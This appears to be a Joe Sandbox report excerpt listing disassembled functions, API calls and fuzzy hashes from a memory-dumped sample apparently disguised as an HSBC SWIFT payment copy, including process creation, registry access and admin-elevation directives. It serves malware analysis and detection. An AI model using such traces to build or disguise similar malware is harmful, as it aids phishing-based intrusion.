APIs

__wcsnicmp.LIBCMT ref: 0077F671
__wcsnicmp.LIBCMT ref: 0077F692
__wcsnicmp.LIBCMT ref: 0077F6AC

Strings

#notrayicon, xrefs: 0077F669
#OnAutoItStartRegister, xrefs: 0077F6A6
#requireadmin, xrefs: 0077F68C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 06dce37e936c5d052e1ed52b41970575bbbc8663ed9a044d1249fb2483399985
Instruction ID: 60a2c8e483ab123099398b258f57e9f562574b4db732fb91782788af383c5552
Opcode Fuzzy Hash: 06dce37e936c5d052e1ed52b41970575bbbc8663ed9a044d1249fb2483399985
Instruction Fuzzy Hash: A22179B2204111E6DA25B634AE06FA773D8DF55390F50C039F88DC7092EB6C9D42C2D4

Function 0077DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DC2F
SysAllocString.OLEAUT32(00000000), ref: 0077DC32
SysAllocString.OLEAUT32 ref: 0077DC53
SysFreeString.OLEAUT32 ref: 0077DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 0077DC76
SysAllocString.OLEAUT32(?), ref: 0077DC84

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3495b843004ef29f6d4ebc1e5b34092ec250d292353ec1a472a8a73041a2f9ce
Instruction ID: 277564f49823d7aee625718a6259428beeaadf088035af7e811cf1a6177b1ca8
Opcode Fuzzy Hash: 3495b843004ef29f6d4ebc1e5b34092ec250d292353ec1a472a8a73041a2f9ce
Instruction Fuzzy Hash: 0C211275604214AF9F219BF8DC89DAB77ACEF49360B10C135F919CB261D678DC41CB64

Function 007A75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007A7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007A763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007A764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007A7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007A7665

Strings

Msctls_Progress32, xrefs: 007A7603

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 65fab7808e30b9b6e44f6c235b63c116f5ad26322bb35de88154aeddcae3888b
Instruction ID: 3852faff23249a436c03268caaf2e7cf154615231afba9b84cd472ddb66f21c9
Opcode Fuzzy Hash: 65fab7808e30b9b6e44f6c235b63c116f5ad26322bb35de88154aeddcae3888b
Instruction Fuzzy Hash: F311B2B2110219BFEF158F64CC85EE77F6DEF49798F014215FA04A60A0CA76AC21DBA4

Function 00749AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00749AE6

Part of subcall function 00743187: EncodePointer.KERNEL32(00000000), ref: 0074318A
Part of subcall function 00743187: __initp_misc_winsig.LIBCMT ref: 007431A5
Part of subcall function 00743187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00749EA0
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00749EB4
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00749EC7
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00749EDA
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00749EED
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00749F00
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00749F13
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00749F26
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00749F39
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00749F4C
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00749F5F
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00749F72
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00749F85
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00749F98
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00749FAB
Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00749FBE

__mtinitlocks.LIBCMT ref: 00749AEB
__mtterm.LIBCMT ref: 00749AF4

Part of subcall function 00749B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00749AF9,00747CD0,007DA0B8,00000014), ref: 00749C56
Part of subcall function 00749B5C: _free.LIBCMT ref: 00749C5D
Part of subcall function 00749B5C: DeleteCriticalSection.KERNEL32(02~,?,?,00749AF9,00747CD0,007DA0B8,00000014), ref: 00749C7F

__calloc_crt.LIBCMT ref: 00749B19
__initptd.LIBCMT ref: 00749B3B
GetCurrentThreadId.KERNEL32 ref: 00749B42

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 7a2d0d902e7cc3fe9ef63ec96a467f557ac6ecf63b865970b1c46b280dad75db
Instruction ID: 82e388172150b0d97ebe81c8006d85c493fc4897112a783b5bc8ca7f64d5ffbb
Opcode Fuzzy Hash: 7a2d0d902e7cc3fe9ef63ec96a467f557ac6ecf63b865970b1c46b280dad75db
Instruction Fuzzy Hash: 2DF0B47270A711AAE635B774BC0BA4B37E4DF02734F218A1AF764C50D2FF2C984189A5

Function 007AB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007AB644
_memset.LIBCMT ref: 007AB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007E6F20,007E6F64), ref: 007AB682
CloseHandle.KERNEL32 ref: 007AB694

Strings

do~, xrefs: 007AB64D
o~, xrefs: 007AB63E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: o~$do~
API String ID: 3277943733-3636950277
Opcode ID: dd84b28f2611d98319d84967e8f9e80ddd09df290b362f3643e82b7220d4b02d
Instruction ID: 28e62d952fc382be5ffb19b7c5bcf060dfaff514b25befc68309fd05d07321f3
Opcode Fuzzy Hash: dd84b28f2611d98319d84967e8f9e80ddd09df290b362f3643e82b7220d4b02d
Instruction Fuzzy Hash: 8EF0FEB2641344BAE7102765BC4AFBB7A9CEB1D7D5F408031FA08E9192D77D5C108BAC

Function 0074406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00743F85), ref: 00744085
GetProcAddress.KERNEL32(00000000), ref: 0074408C
EncodePointer.KERNEL32(00000000), ref: 00744097
DecodePointer.KERNEL32(00743F85), ref: 007440B2

Strings

RoUninitialize, xrefs: 00744074
combase.dll, xrefs: 00744080

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 957880e74f26123dc9c805e8289386c845beabf4107745db5950744b992e22f7
Instruction ID: c5c1417c43a1ee527cc30b3cb879a553e36183e846ee53e1caed3846a5283894
Opcode Fuzzy Hash: 957880e74f26123dc9c805e8289386c845beabf4107745db5950744b992e22f7
Instruction Fuzzy Hash: 29E0BF70642744EFDB10AFA2EC4DB453AA4B759742F10C56CF101E60B0CB7E4600DA1D

Function 007864B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0078660B
_memmove.LIBCMT ref: 00786546

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

_memmove.LIBCMT ref: 007865B9
_memmove.LIBCMT ref: 007866A0
_memmove.LIBCMT ref: 007866B9
_memmove.LIBCMT ref: 007866D5

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
Instruction ID: 34e4fbedb0c302cc1c9f356eb3c8764575a7db2477aec1fa0d1b89d86cfe1dbd
Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
Instruction Fuzzy Hash: 75617E3064066AEBCF05FF60DC89EFE37A5AF05304F084559F9555B292EB38D915CB90

Function 007A01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007A0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007A0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007A038C
RegCloseKey.ADVAPI32(00000000), ref: 007A0399

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 1a3fcf4536174728860fe0b9c3f1413430798523c4bb43c7d51e760761e8c12e
Instruction ID: 5f23c7fe3b3a15526fe3480bd6f64d8128b87d31d94affe7c2061f0c9023aa6f
Opcode Fuzzy Hash: 1a3fcf4536174728860fe0b9c3f1413430798523c4bb43c7d51e760761e8c12e
Instruction Fuzzy Hash: C8513B71108200EFCB14EF64D849E6BBBE9FF85314F04491DF595872A1DB39E905CB92

Function 007A5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007A57FB
GetMenuItemCount.USER32(00000000), ref: 007A5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007A585A
GetMenuItemID.USER32(?,?), ref: 007A58C9
GetSubMenu.USER32(?,?), ref: 007A58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 007A5928

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: d3c28e983410499711435085a9c73c281ba856b95a45f07df04bb45db9f21e6d
Instruction ID: de5debc8e2e54a7f667d05e26f7fb134c2b14d6f1e60fd3ce5bfce4dc95f073f
Opcode Fuzzy Hash: d3c28e983410499711435085a9c73c281ba856b95a45f07df04bb45db9f21e6d
Instruction Fuzzy Hash: EB518E35E00625EFCF05EFA4C845AAEB7B4EF89320F144169E901BB351CB38AE41CB90

Function 0077EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0077EF06
VariantClear.OLEAUT32(00000013), ref: 0077EF78
VariantClear.OLEAUT32(00000000), ref: 0077EFD3
_memmove.LIBCMT ref: 0077EFFD
VariantClear.OLEAUT32(?), ref: 0077F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0077F078

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 58b98edaef4f30951767471ca9eb070f79509bdba388419d8d3868881f12cc15
Instruction ID: 940c43def439863e8046c5c1d470462b1f4a924d74a46a3be2910bc7e359d766
Opcode Fuzzy Hash: 58b98edaef4f30951767471ca9eb070f79509bdba388419d8d3868881f12cc15
Instruction Fuzzy Hash: 3D516AB5A00209EFCB14DF58C884AAAB7B8FF4D354B158569ED59DB301E338E911CFA0

Function 0078220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00782258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007822A3
IsMenu.USER32(00000000), ref: 007822C3
CreatePopupMenu.USER32 ref: 007822F7
GetMenuItemCount.USER32(000000FF), ref: 00782355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00782386

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: a6b73778cc865e2a8cdcb0e8bb86d15b14f8ffef8fe7ad9cf9903b81675413e0
Instruction ID: 7806389331a8557591fdbfe20ca263e6e8bf30f1cbe43177c112654e3086222f
Opcode Fuzzy Hash: a6b73778cc865e2a8cdcb0e8bb86d15b14f8ffef8fe7ad9cf9903b81675413e0
Instruction Fuzzy Hash: E251D270A40209EFDF21EF68D898BADBBF5FF46316F108129E81197692D77C8906CB51

Function 00721765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0072179A
GetWindowRect.USER32(?,?), ref: 007217FE
ScreenToClient.USER32(?,?), ref: 0072181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0072182C
EndPaint.USER32(?,?), ref: 00721876

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 7b94ad11a43fd1dfb1b30559c7e13923f4a41984c16338384c2f412e1b8d6875
Instruction ID: 2173949933fd06e08844c344e312e9aef5cf6e4b5245e680f718c6e9c4491ede
Opcode Fuzzy Hash: 7b94ad11a43fd1dfb1b30559c7e13923f4a41984c16338384c2f412e1b8d6875
Instruction Fuzzy Hash: A241AE30500754EFD710DF24DCC8BBA7BE8FB5A724F144668F9A48B2A1C778A845DB62

Function 007AB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(007E57B0,00000000,011950C0,?,?,007E57B0,?,007AB5A8,?,?), ref: 007AB712
EnableWindow.USER32(00000000,00000000), ref: 007AB736
ShowWindow.USER32(007E57B0,00000000,011950C0,?,?,007E57B0,?,007AB5A8,?,?), ref: 007AB796
ShowWindow.USER32(00000000,00000004,?,007AB5A8,?,?), ref: 007AB7A8
EnableWindow.USER32(00000000,00000001), ref: 007AB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 007AB7EF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8977eae6ca4e3e1187791315fa42d528acba948e45cbac732d56239bd020917f
Instruction ID: 0ae0291e6d0901df3debbd560fa5aec9463a849a328fffd0238780bb3d2a95c6
Opcode Fuzzy Hash: 8977eae6ca4e3e1187791315fa42d528acba948e45cbac732d56239bd020917f
Instruction Fuzzy Hash: F8416034601240AFDB25CF24C499B947BE1FB86310F5882BAE9488F6A3C779AC56CB51

Function 0079709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00794E41,?,?,00000000,00000001), ref: 007970AC

Part of subcall function 007939A0: GetWindowRect.USER32(?,?), ref: 007939B3

GetDesktopWindow.USER32 ref: 007970D6
GetWindowRect.USER32(00000000), ref: 007970DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0079710F

Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC

GetCursorPos.USER32(?), ref: 0079713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00797199

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: f1e1e4181e0b4bdb11ce68b72ee5f60d01505161b4744859982be359ead40255
Instruction ID: 33a4b6969b6719c44724e87188b4ce125f385bb29e616ff3678ceee9acf64db8
Opcode Fuzzy Hash: f1e1e4181e0b4bdb11ce68b72ee5f60d01505161b4744859982be359ead40255
Instruction Fuzzy Hash: 98310472508309ABCB24EF54D849F9BB7E9FFC9314F000919F48597191CB38EA08CB96

Function 00778879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007780C0
Part of subcall function 007780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007780CA
Part of subcall function 007780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007780D9
Part of subcall function 007780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007780E0
Part of subcall function 007780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007780F6

GetLengthSid.ADVAPI32(?,00000000,0077842F), ref: 007788CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007788D6
HeapAlloc.KERNEL32(00000000), ref: 007788DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 007788F6
GetProcessHeap.KERNEL32(00000000,00000000,0077842F), ref: 0077890A
HeapFree.KERNEL32(00000000), ref: 00778911

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b0daf58389a5c762ba2d8882de04b94aad5baa31403b24ea7d69d96f94881aa3
